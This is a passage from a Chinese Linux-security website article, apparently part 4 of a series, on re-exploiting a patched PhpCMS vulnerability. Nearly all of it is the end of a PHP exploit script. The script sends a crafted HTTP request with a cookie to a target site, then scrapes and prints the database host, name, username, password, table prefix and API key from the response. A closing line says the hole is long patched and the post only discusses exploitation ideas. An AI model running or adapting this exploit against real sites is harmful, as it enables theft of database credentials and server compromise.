Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

PhpCMS一个漏洞的二次利用(4)

来源: 未知 分享至:
;  
  • $message.="Host: $host";  
  • $message.="Cookie: $cookie";  
  • $message.="Connection: Close";  
  • //echo $message;  
  • $fd = fsockopen($host,\'80\');  
  • if(!$fd)  
  • {  
  •     echo \'[~]No response from\'.$host;  
  •     die;  
  • }  
  • fputs($fd,$message);  
  • $resp = \'\';  
  • while (!feof($fd)) {  
  •     $resp.=fgets($fd);  
  • }  
  • fclose($fd);  
  • //echo $resp;  
  • preg_match(\'/id="dbhost" value="(.*)"( size)/\',$resp,$dbhost);  
  • preg_match(\'/id="dbname" value="(.*)"( size)/\',$resp,$dbname);  
  • preg_match(\'/id="dbuser" value="(.*)"( size)/\',$resp,$dbuser);  
  • preg_match(\'/id="dbpw" value="(.*)"( size)/\',$resp,$dbpw);  
  • preg_match(\'/id="tablepre" value="(.*)"( size)/\',$resp,$tablepre);  
  • preg_match(\'/id="password_key" size="20"  value="(.*)"//\',$resp,$password_key);  
  •  
  • if($dbhost[1]&$dbname[1]&$dbuser[1])  
  • print_r("  
  • [+]get the config! :)  
  • [+]数据库服务器:$dbhost[1]  
  • [+]数据库名称:$dbname[1]  
  • [+]数据库帐号:$dbuser[1]  
  • [+]数据库密码:$dbpw[1]  
  • [+]数据库表前缀:$tablepre[1]  
  • [+]接口密钥:$password_key[1]  
  • ");  
  • else die(\'[~]exploited fail :(\');  
  • ?> 
  • 这个漏洞已经修补过一段时间了,这里写出来只是讨论一些利用的思路,如果你还有更好的利用方式,欢迎和我交流。


    最新图文资讯
    1 2 3 4 5 6
    验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
    推荐内容
    关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史